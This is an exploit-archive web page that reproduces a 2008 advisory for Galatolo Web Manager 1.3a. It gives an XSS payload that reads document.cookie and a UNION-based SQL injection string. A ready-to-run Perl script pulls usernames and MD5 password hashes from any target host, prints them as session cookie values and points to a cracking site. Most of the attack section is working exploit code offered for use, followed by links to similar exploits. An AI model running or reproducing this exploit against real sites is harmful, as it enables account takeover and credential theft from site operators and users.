手机
当前位置:查字典教程网 >网络安全 >Exploit >Galatolo Web Manager 1.3a
Galatolo Web Manager 1.3a
摘要:--====================================================================...

--== ============================================================================ ==--

--== Galatolo Web Manager 1.3a <= XSS / Remote SQL Injection Vulnerability ==--

--== ============================================================================ ==--

[*] Discovered By: StAkeR ~ StAkeR@hotmail.it

[ ] Discovered On: 14 Jul 2008

[ ] Download: http://gwm.dev-area.org/view.php?id=8

[*] Vulnerabilities:

[*] XSS <= 1.3a

[ ] all.php?tag= [Code Javascript]

[ ] http://site.com/all.php?tag=<script>alert(document.cookie)</script>

[*] SQL (plugin users) 1.3a

[ ] plugins/users/index.php?id= [Code SQL]

[ ] -1 union select null,concat(user,0x3a,pass),null,concat(user(),0x3a,database(),0x3a,version()) from users where id=1--

[*] Exploit:

#!/usr/bin/perl

use strict;

use LWP::UserAgent;

my $host = shift;

my ($start,$content,@login);

my $evilxx = "/plugins/users/index.php?id=-1 union select 1,concat(0x25,user,0x25,pass),null,null from users where id=1--";

if($host =~ /^http://?/i)

{

$start = new LWP::UserAgent or die "[ ] Unable to connectn";

$start->timeout(1);

$start->agent("Mozilla/4.0 (compatible; Lotus-Notes/5.0; Windows-NT)");

$content = $start->get($host.$evilxx);

if($content->is_success)

{

if($content->content =~ /%(. ?)%([0-9a-f]{32})/)

{

push(@login,$1,$2);

print "[ ] Login:n";

print "[ ] Username: $login[0]n";

print "[ ] Password: $login[1]nn";

print "[ ] Cookie Session:n";

print "[ ] gwm_user = $login[0]n";

print "[ ] gwm_pass = $login[1]nn";

print "[ ] Crack Password:n";

print "[ ] md5(md5(password)) for crack:n";

print "[ ] http://passcracking.comn";

}

else

{

print "[ ] Exploit Failedn";

print "[ ] Site Not Vulnerablen";

}

}

}

else

{

print "[ ] Galatolo Web Manager (plugin users) 1.3 Remote SQL Injectionn";

print "[ ] Exploit Coded By: StAkeR ~ StAkeR@hotmail.itnn";

print "[ ] Usage: Perl $0 <host>n";

print "[ ] Usage: Perl $0 http://site.comn";

}

【Galatolo Web Manager 1.3a】相关文章:

Mole Group Last Minute Script

webEdition CMS (we_objectID) Blind SQL Injection Exploit

IntelliTamper 2.0.7 (html parser) Remote Buffer Overflow Exploit

TGS CMS 0.3.2r2 Remote Code Execution Exploit

Anzio Web Print Object

Microsoft Access (Snapview.ocx 10.0.5529.0) ActiveX Remote Exploit

Cisco WebEx Meeting Manager (atucfobj.dll) ActiveX Remote BOF Exploit

Maian Cart 1.1 Insecure Cookie Handling Vulnerability

WebCMS Portal Edition (id) Remote SQL Injection Vulnerability

Joomla Component EZ Store Remote Blind SQL Injection Exploit

精品推荐
分类导航